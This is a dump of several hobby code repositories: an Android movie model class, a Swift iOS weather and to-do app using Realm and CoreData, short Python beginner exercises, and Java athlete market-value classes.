import org.json.JSONException;
import org.json.JSONObject;
import java.text.ParseException;
import java.text.SimpleDateFormat;
import java.util.Date;
/**
* Created by Cristi on 2/16/2018.
*/
public class Movie implements Parcelable {
//original title
private String title;
//movie poster image path
private String image = "";
//movie backdrop image path . for a better detail view
private String backdrop;
// A plot synopsis (called overview in the api)
private String synopsis;
//user rating (called vote_average in the api)
private Double rating;
//release date
private Date releaseDate;
public Movie()
{
}
public Movie(String title, String synopsys, String image, Double rating, Date releaseDate)
{
this.title = title;
this.synopsis = synopsys;
this.image = image;
this.rating = rating;
this.releaseDate = new Date(releaseDate.getTime());
}
public String getTitle() {return title;}
public String getImageUrl() {return image;}
public String getBackdropUrl() {return backdrop;}
public String getSynopsis() {return synopsis;}
public Double getRating() {return rating;}
public Date getReleaseDate() {return releaseDate;}
@Override
public int describeContents() {
return 0;
}
private static final String TITLE = "title";
private static final String POSTER_PATH = "poster_path";
private static final String BACKDROP_PATH = "backdrop_path";
private static final String OVERVIEW = "overview";
private static final String VOTE_AVERAGE = "vote_average";
private static final String RELEASE_DATE = "release_date";
public Movie(JSONObject fromMovieDbJson)
{
/*
MovieDB Json Schema
poster_path string or null optional
overview string optional
release_date string optional
title string optional
vote_average number optional
Example
{
"poster_path": "/e1mjopzAS2KNsvpbpahQ1a6SkSn.jpg",
"overview": "From DC Comics comes the Suicide Squad, an antihero team of incarcerated supervillains who act as deniable assets for the United States government, undertaking high-risk black ops missions in exchange for commuted prison sentences.",
"release_date": "2016-08-03",
"title": "Suicide Squad",
"vote_average": 5.91
}
*/
try {
title = fromMovieDbJson.optString(TITLE, "");
image = fromMovieDbJson.optString(POSTER_PATH, "");
backdrop = fromMovieDbJson.optString(BACKDROP_PATH, "");
synopsis = fromMovieDbJson.optString(OVERVIEW, "");
rating = fromMovieDbJson.optDouble(VOTE_AVERAGE, 0 );
if (!fromMovieDbJson.isNull(RELEASE_DATE))
{ // parse the String representing the release date. the format is yyyy-MM-dd
String relDate = fromMovieDbJson.getString(RELEASE_DATE);
@SuppressLint("SimpleDateFormat")
SimpleDateFormat simpleDateFormat = new SimpleDateFormat("yyyy-MM-dd");
releaseDate = simpleDateFormat.parse(relDate);
}
}
catch (JSONException e){ e.printStackTrace(); }
catch (ParseException e) { e.printStackTrace();
}
}
private Movie(Parcel parcel)
{
title = parcel.readString();
image = parcel.readString();
backdrop = parcel.readString();
synopsis = parcel.readString();
rating = parcel.readDouble();
releaseDate = new Date(parcel.readLong());
}
@Override
public void writeToParcel(Parcel parcel, int i) {
parcel.writeString(title);
parcel.writeString(image);
parcel.writeString(backdrop);
parcel.writeString(synopsis);
parcel.writeDouble(rating);
parcel.writeLong(releaseDate.getTime());
}
public static final Parcelable.Creator<Movie> CREATOR = new Parcelable.Creator<Movie>() {
@Override
public Movie createFromParcel(Parcel parcel) {
return new Movie(parcel);
}
@Override
public Movie[] newArray(int i) {
return new Movie[i];
}
};
}
| 651e7fc5a346d1435e3b2c1883fb31274476665f | [
"Markdown",
"Java"
] | 2 | Markdown | cristian-vescan/PopularMovies | bb34b4708d7fbb70a2dadb879771f8e32f8ac18e | 4499603251f4ee0966551a069043484607259f21 |
refs/heads/master | <repo_name>Anurag-Reddy97/NTTDATA<file_sep>/java/src/unique/main.java
package unique;
public class main {
public static void main(String[] args) {
// TODO Auto-generated method stub
unique u = new unique();
int res=u.unique(1600);
System.out.println(res);
}
}<file_sep>/java/src/unique/unique.java
package unique;
public class unique {
public int unique(int input0) {
int count=0;
int uni=0;
String s = ""+input0;
int n = s.length();
int arr[] = new int[n+1];
for(int i=1;i<n;i++)
{
int num=input0%10;
System.out.println(num);
arr[i] = num;
input0=input0/10;
}
if(input0>0)
{
for(int i=0;i<n-1;i++)
{
if(arr[i+1]==arr[i])
{
count=count+1;
}
}
}
uni=n-count;
return uni;
}
}
<file_sep>/README.md
# NTTDATA
This is an Nttdata repo
| 85a8da2472bade024c9eccab17a33ee7d356b693 | [
"Markdown",
"Java"
] | 3 | Java | Anurag-Reddy97/NTTDATA | 3e3679351b3c836a68438df20af0a67ac146b80e | 3c22f681f949d7786d9719b6553d358d267b087b |
refs/heads/master | <file_sep>//
// FioVC.swift
// mod14
//
// Created by <NAME> on 19/03/2019.
// Copyright © 2019 <NAME>. All rights reserved.
//
import UIKit
class FioVC: UIViewController {
@IBOutlet weak var nameTextField: UITextField!
@IBOutlet weak var surnameTextField: UITextField!
override func viewDidLoad() {
super.viewDidLoad()
nameTextField.text = UserDefaultsService.shared.name
surnameTextField.text = UserDefaultsService.shared.surname
}
@IBAction func buttonTapped(_ sender: Any) {
UserDefaultsService.shared.name = nameTextField.text
UserDefaultsService.shared.surname = surnameTextField.text
}
}
<file_sep>//
// DataManager.swift
// mod13
//
// Created by <NAME> on 18/03/2019.
// Copyright © 2019 <NAME>. All rights reserved.
//
import Foundation
class DataManager {
let url = URL(string: "https://api.darksky.net/forecast/7bc258ca3a68cfa7a5ec70a69199ea70/55.755826,37.6173?units=si&exclude=flags,minutely,alerts&lang=ru")!
func getWeatherData(_ completion: @escaping (_ weather: Weather?, _ error: String?) -> Void) {
let request = URLRequest(url: url)
URLSession.shared.dataTask(with: request) { data, response, error in
if let error = error {
print("🌶 \(error.localizedDescription)")
completion(nil, error.localizedDescription)
} else if let data = data {
let decoder = JSONDecoder()
let weather = try? decoder.decode(Weather.self, from: data)
completion(weather, nil)
} else {
completion(nil, "unknown error")
}
}.resume()
}
}
<file_sep>//
// TODOCoreDataVC.swift
// mod14
//
// Created by <NAME> on 19/03/2019.
// Copyright © 2019 <NAME>. All rights reserved.
//
import UIKit
class TODOCoreDataVC: UIViewController {
var dataSource: [Task] = []
@IBOutlet weak var tableView: UITableView!
override func viewDidLoad() {
super.viewDidLoad()
self.dataSource = CoreDataService.getTasks()
}
@IBAction func addTapped(_ sender: Any) {
let alert = UIAlertController(title: "Add", message: "", preferredStyle: .alert)
var textField: UITextField!
alert.addTextField { tf in
textField = tf
}
alert.addAction(UIAlertAction(title: "Cancel", style: .destructive, handler: nil))
alert.addAction(UIAlertAction(title: "Save", style: .default, handler: { action in
guard let text = textField.text, !text.isEmpty else { return }
let task = Task(context: CoreDataService.context)
task.task = text
CoreDataService.saveContext()
self.dataSource.append(task)
self.tableView.insertRows(at: [IndexPath.init(row: self.dataSource.count - 1, section: 0)], with: .automatic)
}))
self.present(alert, animated: true, completion: nil)
}
}
extension TODOCoreDataVC: UITableViewDataSource, UITableViewDelegate {
func tableView(_ tableView: UITableView, numberOfRowsInSection section: Int) -> Int {
return dataSource.count
}
func tableView(_ tableView: UITableView, cellForRowAt indexPath: IndexPath) -> UITableViewCell {
let cell = tableView.dequeueReusableCell(withIdentifier: "Cell", for: indexPath)
cell.textLabel?.text = dataSource[indexPath.row].task
return cell
}
func tableView(_ tableView: UITableView, trailingSwipeActionsConfigurationForRowAt indexPath: IndexPath) -> UISwipeActionsConfiguration? {
let action = UIContextualAction(style: .destructive, title: "Delete") { _, _, completion in
CoreDataService.remove(task: self.dataSource[indexPath.row])
self.dataSource.remove(at: indexPath.row)
self.tableView.deleteRows(at: [indexPath], with: .automatic)
completion(true)
}
return UISwipeActionsConfiguration(actions: [action])
}
}
<file_sep>//
// WeatherVC.swift
// mod14
//
// Created by <NAME> on 19/03/2019.
// Copyright © 2019 <NAME>. All rights reserved.
//
import UIKit
import RealmSwift
class WeatherVC: UIViewController {
let cellId = "WeatherCell"
@IBOutlet weak var tableView: UITableView!
var dataSource = List<DailyWeather>()
@IBOutlet weak var currentTemperatureLabel: UILabel!
@IBOutlet weak var currentSummaryLabel: UILabel!
@IBOutlet weak var firstTimeLabel: UILabel!
@IBOutlet weak var secondTimeLabel: UILabel!
@IBOutlet weak var thirdTimeLabel: UILabel!
@IBOutlet weak var firstTemperatureLabel: UILabel!
@IBOutlet weak var secondTemperatureLabel: UILabel!
@IBOutlet weak var thirdTemperatureLabel: UILabel!
override func viewDidLoad() {
super.viewDidLoad()
self.tableView.allowsSelection = false
getPersistanceWeather()
self.tableView.register(UINib(nibName: cellId, bundle: nil), forCellReuseIdentifier: cellId)
let manager = DataManager()
manager.getWeatherData { [weak self] weather, error in
if let error = error {
print("err \(error)")
} else if let weather = weather {
DispatchQueue.main.async {
if let firstHour = weather.hourly?.data[1],
let secondHour = weather.hourly?.data[2],
let thirdHour = weather.hourly?.data[3] {
self?.firstTimeLabel.text = DateNormalizer.shared.normalizeWithHours(date: firstHour.time)
self?.secondTimeLabel.text = DateNormalizer.shared.normalizeWithHours(date: secondHour.time)
self?.thirdTimeLabel.text = DateNormalizer.shared.normalizeWithHours(date: thirdHour.time)
self?.firstTemperatureLabel.text = "\(String(firstHour.temperature))° C"
self?.secondTemperatureLabel.text = "\(String(secondHour.temperature))° C"
self?.thirdTemperatureLabel.text = "\(String(thirdHour.temperature))° C"
self?.currentTemperatureLabel.text = "\(String(weather.currently?.temperature ?? 0))° C"
self?.currentSummaryLabel.text = weather.currently?.summary
if let daileData = weather.daily?.data {
self?.dataSource.append(objectsIn: daileData)
}
self?.tableView.reloadData()
}
}
}
}
}
func getPersistanceWeather() {
if let weather = RealmService.shared.getWeather() {
self.dataSource = weather.daily?.data ?? List<DailyWeather>()
self.tableView.reloadData()
if let firstHour = weather.hourly?.data[1],
let secondHour = weather.hourly?.data[2],
let thirdHour = weather.hourly?.data[3] {
self.firstTimeLabel.text = DateNormalizer.shared.normalizeWithHours(date: firstHour.time)
self.secondTimeLabel.text = DateNormalizer.shared.normalizeWithHours(date: secondHour.time)
self.thirdTimeLabel.text = DateNormalizer.shared.normalizeWithHours(date: thirdHour.time)
self.firstTemperatureLabel.text = "\(String(firstHour.temperature))° C"
self.secondTemperatureLabel.text = "\(String(secondHour.temperature))° C"
self.thirdTemperatureLabel.text = "\(String(thirdHour.temperature))° C"
self.currentTemperatureLabel.text = "\(String(weather.currently?.temperature ?? 0))° C"
self.currentSummaryLabel.text = weather.currently?.summary
}
}
}
}
extension WeatherVC: UITabBarDelegate, UITableViewDataSource {
func tableView(_ tableView: UITableView, numberOfRowsInSection section: Int) -> Int {
return self.dataSource.count
}
func tableView(_ tableView: UITableView, cellForRowAt indexPath: IndexPath) -> UITableViewCell {
let cell = self.tableView.dequeueReusableCell(withIdentifier: cellId) as! WeatherCell
cell.setup(weather: dataSource[indexPath.row])
return cell
}
}
<file_sep>//
// WeatherCell.swift
// mod13
//
// Created by <NAME> on 14/03/2019.
// Copyright © 2019 <NAME>. All rights reserved.
//
import UIKit
class WeatherCell: UITableViewCell {
@IBOutlet weak var dateLabel: UILabel!
@IBOutlet weak var temperatureLabel: UILabel!
@IBOutlet weak var summaryLabel: UILabel!
override func awakeFromNib() {
super.awakeFromNib()
// Initialization code
}
override func setSelected(_ selected: Bool, animated: Bool) {
super.setSelected(selected, animated: animated)
// Configure the view for the selected state
}
func setup(weather: DailyWeather) {
self.dateLabel.text = DateNormalizer.shared.normalize(date: weather.time)
self.temperatureLabel.text = "\(String(weather.temperatureHigh))° C"
self.summaryLabel.text = weather.summary
}
}
<file_sep>//
// Todo.swift
// mod14
//
// Created by <NAME> on 19/03/2019.
// Copyright © 2019 <NAME>. All rights reserved.
//
import Foundation
import RealmSwift
class Todo: Object {
@objc dynamic var task: String = ""
}
<file_sep>//
// Weather.swift
// mod13
//
// Created by <NAME> on 14/03/2019.
// Copyright © 2019 <NAME>. All rights reserved.
//
import Foundation
import Realm
import RealmSwift
@objcMembers class Currently: Object, Decodable {
dynamic var time: Double = 0
dynamic var temperature: Double = 0
dynamic var summary: String = ""
enum CodingKeys: String, CodingKey {
case time = "time"
case temperature = "temperature"
case summary = "summary"
}
required init(from decoder: Decoder) throws {
let container = try decoder.container(keyedBy: CodingKeys.self)
time = try container.decode(Double.self, forKey: .time)
temperature = try container.decode(Double.self, forKey: .temperature)
summary = try container.decode(String.self, forKey: .summary)
super.init()
}
override static func primaryKey() -> String? {
return "summary"
}
required init() {
super.init()
}
required init(value: Any, schema: RLMSchema) {
super.init(value: value, schema: schema)
}
required init(realm: RLMRealm, schema: RLMObjectSchema) {
super.init(realm: realm, schema: schema)
}
}
@objcMembers class DailyWeather: Object, Decodable {
dynamic var time: Double = 0
dynamic var temperatureHigh: Double = 0
dynamic var summary: String = ""
enum CodingKeys: String, CodingKey {
case time = "time"
case temperatureHigh = "temperatureHigh"
case summary = "summary"
}
required init(from decoder: Decoder) throws {
let container = try decoder.container(keyedBy: CodingKeys.self)
time = try container.decode(Double.self, forKey: .time)
temperatureHigh = try container.decode(Double.self, forKey: .temperatureHigh)
summary = try container.decode(String.self, forKey: .summary)
super.init()
}
required init() {
super.init()
}
required init(value: Any, schema: RLMSchema) {
super.init(value: value, schema: schema)
}
required init(realm: RLMRealm, schema: RLMObjectSchema) {
super.init(realm: realm, schema: schema)
}
}
@objcMembers class Daily: Object, Decodable {
let data = RealmSwift.List<DailyWeather>()
enum CodingKeys: String, CodingKey {
case data = "data"
}
required init(from decoder: Decoder) throws {
let container = try decoder.container(keyedBy: CodingKeys.self)
let data = try container.decode([DailyWeather].self, forKey: .data)
self.data.append(objectsIn: data)
super.init()
}
required init() {
super.init()
}
required init(value: Any, schema: RLMSchema) {
super.init(value: value, schema: schema)
}
required init(realm: RLMRealm, schema: RLMObjectSchema) {
super.init(realm: realm, schema: schema)
}
}
@objcMembers class Hourly: Object, Decodable {
let data = RealmSwift.List<Currently>()
enum CodingKeys: String, CodingKey {
case data = "data"
}
required init(from decoder: Decoder) throws {
let container = try decoder.container(keyedBy: CodingKeys.self)
let data = try container.decode([Currently].self, forKey: .data)
self.data.append(objectsIn: data)
super.init()
}
required init() {
super.init()
}
required init(value: Any, schema: RLMSchema) {
super.init(value: value, schema: schema)
}
required init(realm: RLMRealm, schema: RLMObjectSchema) {
super.init(realm: realm, schema: schema)
}
}
@objcMembers class Weather: Object, Decodable {
dynamic var currently: Currently?
dynamic var daily: Daily?
dynamic var hourly: Hourly?
}
<file_sep>//
// CoreDataService.swift
// mod14
//
// Created by <NAME> on 19/03/2019.
// Copyright © 2019 <NAME>. All rights reserved.
//
import Foundation
import CoreData
class CoreDataService {
private init() {}
static let context = persistentContainer.viewContext
static var persistentContainer: NSPersistentContainer = {
let container = NSPersistentContainer(name: "mod14")
container.loadPersistentStores(completionHandler: { (storeDescription, error) in
if let error = error as NSError? {
fatalError("Unresolved error \(error), \(error.userInfo)")
}
})
return container
}()
static func saveContext () {
let context = persistentContainer.viewContext
if context.hasChanges {
do {
try context.save()
} catch {
let nserror = error as NSError
fatalError("Unresolved error \(nserror), \(nserror.userInfo)")
}
}
}
static func save(strTask: String) {
let task = Task(context: CoreDataService.context)
task.task = strTask
saveContext()
}
static func getTasks() -> [Task] {
var tasks: [Task] = []
let fetchRequest: NSFetchRequest<Task> = Task.fetchRequest()
do {
let result = try context.fetch(fetchRequest)
tasks = result
} catch {
let nserror = error as NSError
fatalError("Unresolved error \(nserror), \(nserror.userInfo)")
}
return tasks
}
static func remove(task: Task) {
let fetchRequest: NSFetchRequest<Task> = Task.fetchRequest()
do {
let result = try context.fetch(fetchRequest)
for item in result {
if item.task == task.task {
context.delete(item)
}
}
saveContext()
} catch {
let nserror = error as NSError
fatalError("Unresolved error \(nserror), \(nserror.userInfo)")
}
}
}
<file_sep>//
// DateNormalizer.swift
// mod13
//
// Created by <NAME> on 18/03/2019.
// Copyright © 2019 <NAME>. All rights reserved.
//
import Foundation
class DateNormalizer {
static let shared = DateNormalizer()
let formatter = DateFormatter()
private init() {
formatter.locale = Locale(identifier: "ru")
}
func normalize(date: Double) -> String {
formatter.dateFormat = "dd MMMM"
let normDate = Date(timeIntervalSince1970: date)
let stringDate = formatter.string(from: normDate)
return stringDate
}
func normalizeWithHours(date: Double) -> String {
formatter.dateFormat = "HH:mm"
let normDate = Date(timeIntervalSince1970: date)
let stringDate = formatter.string(from: normDate)
return stringDate
}
}
<file_sep>//
// RealmSirvice.swift
// mod14
//
// Created by <NAME> on 19/03/2019.
// Copyright © 2019 <NAME>. All rights reserved.
//
import Foundation
import RealmSwift
class RealmService {
static let shared = RealmService()
private let realm = try! Realm()
func getTasks() -> Results<Todo> {
return realm.objects(Todo.self)
}
func save(task: String) {
let todo = Todo()
todo.task = task
try! realm.write {
realm.add(todo)
}
}
func remove(todo: Todo) {
try! realm.write {
realm.delete(todo)
}
}
func getWeather() -> Weather? {
return realm.objects(Weather.self).first ?? nil
}
func saveWeather(weather: Weather) {
try! realm.write {
realm.add(weather, update: true)
}
}
}
<file_sep>//
// UserDefaultsService.swift
// mod14
//
// Created by <NAME> on 19/03/2019.
// Copyright © 2019 <NAME>. All rights reserved.
//
import Foundation
class UserDefaultsService {
static let shared = UserDefaultsService()
private let nameKey = "UserDefaultsService.nameKey"
private let surnameKey = "UserDefaultsService.surnameKey"
var name: String? {
set { UserDefaults.standard.set(newValue, forKey: nameKey) }
get { return UserDefaults.standard.string(forKey: nameKey) }
}
var surname: String? {
set { UserDefaults.standard.set(newValue, forKey: surnameKey) }
get { return UserDefaults.standard.string(forKey: surnameKey) }
}
}
| c957b1d8ee8e6c5fa125dbb82d3f2445c755ee1e | [
"Swift"
] | 11 | Swift | trantSolo/skillbox_mod14 | 7bcbcf91e53f67d23922308d52131ca77c2dad3f | 2db3bb57fdedfc6c474106ac3edb92740bd5c552 |
refs/heads/main | <file_sep># -*- coding: utf-8 -*-
"""
Created on Sat Apr 17 12:32:13 2021
@author: c109156119
"""
def main():
ans=list(map(int,list(input("請輸入第一組數字"))))
ram=list(map(int,list(input("請輸入第二組數字"))))
a,b=0,0
for i in range(len(ram)):
if ram[i]== ans[i]:a+=1
elif ram[i] in ans:b+=1
if a ==len(ram):print(a,"A",b,"B","全對")
main()
<file_sep>a=int(input("輸入第一行正整數為: "))
b=input("第二行中數列中的數字為:").split()
if len(set(b)) == a:
print("每個數字剛好只出現1次")
else:
i=1
while True:
for j in list(set(b)): b.remove(j)
i+=1
if len(b) == 1:
print("最大出現次數的數字為:"+b[0])
print("出現次數為:"+str(i))
break
<file_sep>a=input("輸入一整數序列為: ").split()
b=set(a)
if len(b) > (len(a)+1)//2:
print("NO")
else:
while len(a) > 1:
for i in list(set(a)): a.remove(i)
print(a[0])
<file_sep>str1=input("輸入s1為:")
str2=input("輸入s2為:")
if len(str2.replace(str1, ""))!=len(str2):
print("YES")
else:
print("NO")<file_sep>list1=[]
list2=[]
a=int(input("輸入n值:"))
for i in range(a):
name=str(input("請輸入姓名:"))
email=str(input("請輸入電子郵件:"))
list1.append(name)
list2.append(email)
Who=str(input("請輸入要查詢電子郵件的姓名:"))
for i in range(len(list1)):
while(list1[i]==Who):
print(Who,"電子郵件帳號為",list2[i])
break<file_sep>m=int(input("請輸入階層值M:"))
N=0
x=1
while x<m:
N+=1
x*=N
print("超過M為",m,"的最小階層N值為",N)
<file_sep>ans=list("1234")
user=list(input(""))
a=0
b=0
for i in range(4):
if (ans[i]==user[i]):
a=a+1
else:
b=b+1
print(a,"A",b,"B")<file_sep>a = int(input("請輸入一正整數:"))
if a%2==0 and a%11==0 and a%5!=0 and a%7!=0:
print(str(a)+'為新公倍數?:YES')
else:
print(str(a)+'為新公倍數?:NO')
<file_sep># -*- coding: utf-8 -*-
"""
Created on Wed Jan  6 16:03:23 2021
@author: User
"""
# Fast-food order calculator: price = main dish + set menu + optional
# drink/fries upgrades, keyed by the characters of the user's input.
def main():
    m1={"1":72, "2":62, "3":82, "4":44,"5":60}
    ma={"A":55,"B":68}
    drink={"是":7,"否":0,}
    fries={"是":13,"否":0}
    money=0
    meal= (input("主餐和聲及套餐:"))
    # meal[0] selects the main dish, meal[1] the set menu
    money+=m1[meal[0]]
    money+=ma[meal[1]]
    money+=drink[input("是否升級大悲:")]
    money+=fries[input("受否升級大暑:")]
    print("總共為",str(money),"元")
main()<file_sep>dict1={"蘋果":"紅色","香蕉":"黃色","葡萄":"紫色","藍莓":"藍色","橘子":"橘色"}
key=list(dict1.keys())
print("dictˍkeys(",key[0],",",key[1],",",key[2],",",key[3],",",key[4],")")
food=str(input("請輸入水果:"))
# Look up the fruit's colour; a direct dict1[food] lookup would be
# equivalent to this if/elif chain.
if(food==key[0]):
    print("蘋果是紅色")
elif(food==key[1]):
    print("香蕉是黃色")
elif(food==key[2]):
    print("葡萄是紫色")
elif(food==key[3]):
    print("藍莓是藍色")
elif(food==key[4]):
    print("橘子是橘色")
<file_sep>list1=[]
# Read ten integers, sort ascending, then report the three largest and
# three smallest values.
for i in range(10):
    print("請輸入第",i+1,"個數字:",end="")
    num=int(input())
    list1.append(num)
list1.sort()
print("最大的3個數字為:",list1[9],",",list1[8],",",list1[7])
print("最小的3個數字為:",list1[2],",",list1[1],",",list1[0])
<file_sep># -*- coding: utf-8 -*-
"""
Created on Fri Jun 11 14:50:15 2021
@author: c109156119
"""
# Reads coefficients a, b, c from stdin and prints the (truncated) integer
# roots of a*x^2 + b*x + c = 0.
def main():
    a = int(input())
    b = int(input())
    c = int(input())
    # Quadratic formula. The denominator must be (2*a): the original
    # "/ 2*a" divided by 2 and then MULTIPLIED by a, which is wrong for
    # every a != 1 and a != -1.
    # NOTE(review): int() truncates irrational roots and a negative
    # discriminant raises on the complex result — presumably inputs are
    # guaranteed to yield integer roots.
    x = [int((-b + (b**2 - 4*a*c)**0.5) / (2*a)), int((-b - (b**2 - 4*a*c)**0.5) / (2*a))]
    # Roots summing to zero collapse to a single "0"; otherwise drop a
    # zero root and print the remaining list.
    if sum(x) == 0: print(0)
    else:
        if 0 in x: x.remove(0)
        print(x)
main()
<file_sep>a=str(input("輸入查詢的學號為:"))
b={"123":"Tom","456":"Cat","789":"Nana","321":"Lim","654":"Won"}
c=list(b.keys())
value=list(b.values())
# Match the queried student id against each key and print the record;
# the department code is hard-coded per branch.
if(a==c[0]):
    print("學生資料為:",c[0],value[0],"DTGD")
elif(a==c[1]):
    print("學生資料為:",c[1],value[1],"CSIE")
elif(a==c[2]):
    print("學生資料為:",c[2],value[2],"ASIE")
elif(a==c[3]):
    print("學生資料為:",c[3],value[3],"DBA")
elif(a==c[4]):
    print("學生資料為:",c[4],value[4],"FDD")
<file_sep>a=input("輸入一字串為:")
print("There are",len(a),"characters")
<file_sep>an = list(input("輸入a n:"))
# Input is expected as "a n" (single digits separated by one space);
# index 2 skips the space character.
a = int(an[0])
n = int(an[2])
# Derivative of a*x**n printed as (a*n)x**(n-1).
print(str(a*n)+'x**'+str(n-1))<file_sep>i=int(input("請輸入電費"))
summer=0
nosummer=0
Degree=0
# Tiered electricity pricing: charge each bracket at its own rate, then
# clamp 'i' to the bracket's lower bound and fall through to the next tier.
# NOTE(review): 'Degree=i-701' looks off by one relative to the other
# tiers (which use the bracket bound itself) — confirm against the tariff.
if i>700:
    Degree=i-701
    summer+=Degree*5.63
    nosummer+=Degree*4.50
    i=700
if i>500 and i<701:
    Degree=i-500
    summer+=Degree*4.97
    nosummer+=Degree*4.01
    i=500
if i>330 and i<501:
    Degree=i-330
    summer+=Degree*4.39
    nosummer+=Degree*3.61
    i=330
if i>120 and i<331:
    Degree=i-120
    summer+=Degree*3.02
    nosummer+=Degree*2.68
    i=120
if i<121:
    summer+=i*2.10
    nosummer+=i*2.10
print('Summer month:'+str(summer))
print('noSummer month:'+str(nosummer))
<file_sep>M = int(input("小明身上有幾元:"))
N = int(input("販賣機有幾種飲料:"))
shopl = []
index = 0
for i in range(0,N):
shop = input("飲料價格:")
shopl.append(shop)
for x in shopl:
if M/int(x) > 1 or M/int(x) == 1:
index+=1
print(index)
<file_sep>animal=["rat","ox","tiger","rabbit","dragon","snake","horse","sheep","monkey","rooster","dog","pig"]
Year = int(input())
# Chinese zodiac: the +8 offset aligns the Gregorian year with the
# 12-animal cycle (e.g. 2020 -> rat).
print(animal[(Year+8)%12])
1<file_sep>a = int(input("請輸入組數:"))
# For each of the 'a' groups, read two counts separated by a space and
# charge 250 per unit of the first and 175 per unit of the second.
for i in range(1,a+1):
    b = input("第"+str(i)+"組")
    c=b.split(" ")
    money=250*int(c[0])+175*int(c[1])
    print("第"+str(i)+'組應收費用:'+str(money))
| 73c550ad6512581313a6620a6e45262fc6eaa102 | [
"Python"
] | 19 | Python | nkustC109156140/C109156140 | 28c4f4304f1d3a3e0894a94b807626bf7933732f | c4ee594028fb926d20f819297ef1b6da469678d7 |
refs/heads/master | <file_sep>package com.continuada.nbaapi;
/**
 * Basketball player with a points-per-game statistic. The market value is
 * the sum of three salary-based components: age, points per game and
 * position on court.
 */
public class JogadorBasquete extends Atleta {

    /** Average points scored per game. */
    private Double pontosPorJogo;

    public JogadorBasquete(Integer idJogador, String nome, Integer idade, String posicao, Double salario, Double pontosPorJogo) {
        super(idJogador, nome, idade, posicao, salario);
        this.pontosPorJogo = pontosPorJogo;
    }

    /** Total market value: age component + points component + position component. */
    public Double calcularValorMercado() {
        return calcularValorIdade() + calcularValorPontosPorJogo() + calcularValorPosicao();
    }

    /** Age component: younger players are worth a larger salary multiple. */
    @Override
    public Double calcularValorIdade() {
        Integer idade = getIdade();
        Double salario = getSalario();
        if (idade >= 18 && idade <= 24) {
            return salario * 70.0;
        }
        if (idade > 24 && idade <= 26) {
            return salario * 50.0;
        }
        if (idade > 26 && idade <= 30) {
            return salario * 30.0;
        }
        if (idade > 30) {
            return salario * 15.0;
        }
        // Under 18: base multiplier.
        return salario * 1.0;
    }

    /** Position component: point guards (PG) carry the highest multiplier. */
    @Override
    public Double calcularValorPosicao() {
        String posicao = getPosicao();
        Double salario = getSalario();
        if (posicao.equals("PG")) {
            return salario * 8.0;
        }
        if (posicao.equals("SG")) {
            return salario * 5.0;
        }
        if (posicao.equals("SF")) {
            return salario * 4.0;
        }
        if (posicao.equals("PF")) {
            return salario * 3.0;
        }
        if (posicao.equals("C")) {
            return salario * 2.0;
        }
        // Unknown position code: base multiplier.
        return salario * 1.0;
    }

    /** Scoring component: higher points-per-game brackets earn larger multiples. */
    @Override
    public Double calcularValorPontosPorJogo() {
        Double salario = getSalario();
        if (pontosPorJogo < 5.0) {
            return salario * 0.5;
        }
        if (pontosPorJogo < 10.0) {
            return salario * 0.7;
        }
        if (pontosPorJogo < 15.0) {
            return salario * 0.9;
        }
        if (pontosPorJogo < 20.0) {
            return salario * 1.0;
        }
        if (pontosPorJogo < 80.0) {
            return salario * 3.0;
        }
        // 80+ points per game falls back to the base multiplier.
        return salario * 1.0;
    }

    public Double getPontosPorJogo() {
        return pontosPorJogo;
    }

    public void setPontosPorJogo(Double pontosPorJogo) {
        this.pontosPorJogo = pontosPorJogo;
    }

    @Override
    public String toString() {
        return "Jogador{" + "pontosPorJogo=" + pontosPorJogo + "} " + super.toString();
    }
}
<file_sep>package com.continuada.nbaapi;
/**
 * Soccer player whose market value is derived from age, position and goals
 * scored. Mirrors {@link JogadorBasquete}.
 */
public class JogadorFutebol extends Atleta{
    /** Goals scored. */
    private Integer gols;
    /**
     * Team the player belongs to. Fix: the constructor previously received
     * this value but silently discarded it (no field existed).
     */
    private Time time;

    /**
     * @param idJogador player identifier
     * @param nome player name
     * @param idade age in years
     * @param posicao position code: GOL, DEF, MEIA or AT
     * @param salario salary used as the base of every valuation component
     * @param time team of the player (now stored instead of being dropped)
     * @param gols goals scored
     */
    public JogadorFutebol(Integer idJogador, String nome, Integer idade, String posicao, Double salario, Time time, Integer gols) {
        super(idJogador, nome, idade, posicao, salario);
        this.time = time;
        this.gols = gols;
    }

    /**
     * Total market value: sum of the age, goals and position components.
     * Added for consistency with JogadorBasquete#calcularValorMercado.
     */
    public Double calcularValorMercado() {
        return calcularValorIdade() + calcularValorPontosPorJogo() + calcularValorPosicao();
    }

    /** Age component: younger players are worth a larger salary multiple. */
    @Override
    public Double calcularValorIdade() {
        if(getIdade() >= 18 && getIdade() <= 24){
            return getSalario() * 70.0;
        }else if(getIdade() > 24 && getIdade()<= 26){
            return getSalario() * 50.0;
        }else if(getIdade() > 26 && getIdade() <= 30){
            return getSalario() * 30.0;
        }else if(getIdade() > 30){
            return getSalario() * 15.0;
        }else{
            return getSalario() * 1.0;
        }
    }

    /** Position component: goalkeepers (GOL) carry the highest multiplier. */
    @Override
    public Double calcularValorPosicao() {
        switch (getPosicao()) {
            case "GOL":
                return getSalario() * 8.0;
            case "DEF":
                return getSalario() * 5.0;
            case "MEIA":
                return getSalario() * 4.0;
            case "AT":
                return getSalario() * 3.0;
            default:
                return getSalario() * 1.0;
        }
    }

    /**
     * Goals component (named after the basketball "points per game" hook).
     * NOTE(review): 4 or 5 goals falls through to the base multiplier while
     * more than 5 earns 3.0 — confirm the bracket bounds are intended.
     */
    @Override
    public Double calcularValorPontosPorJogo() {
        if(this.gols < 1.0){
            return getSalario() * 0.5;
        }else if(this.gols < 2.0){
            return getSalario() * 0.7;
        }else if(this.gols < 3.0){
            return getSalario() * 0.9;
        }else if(this.gols < 4.0){
            return getSalario() * 1.0;
        }else if(this.gols > 5.0){
            return getSalario() * 3.0;
        }else{
            return getSalario() * 1.0;
        }
    }

    public Integer getGols() {
        return gols;
    }

    public void setGols(Integer gols) {
        this.gols = gols;
    }

    public Time getTime() {
        return time;
    }

    public void setTime(Time time) {
        this.time = time;
    }

    @Override
    public String toString() {
        return "JogadorFutebol{" +
                "gols=" + gols +
                "} " + super.toString();
    }
}
<file_sep>package com.continuada.nbaapi;
import org.omg.CosNaming.NamingContextExtPackage.StringNameHelper;
/**
 * Base class for athletes. Holds identification and salary data and
 * declares the three salary-based components that subclasses combine into
 * a market value.
 */
public abstract class Atleta {
    private Integer idJogador;
    private String nome;
    private Integer idade;
    private String posicao;
    private Double salario;

    /** Age-based component of the market value. */
    public abstract Double calcularValorIdade();

    /** Position-based component of the market value. */
    public abstract Double calcularValorPosicao();

    /** Performance-based component (points per game, goals, ...). */
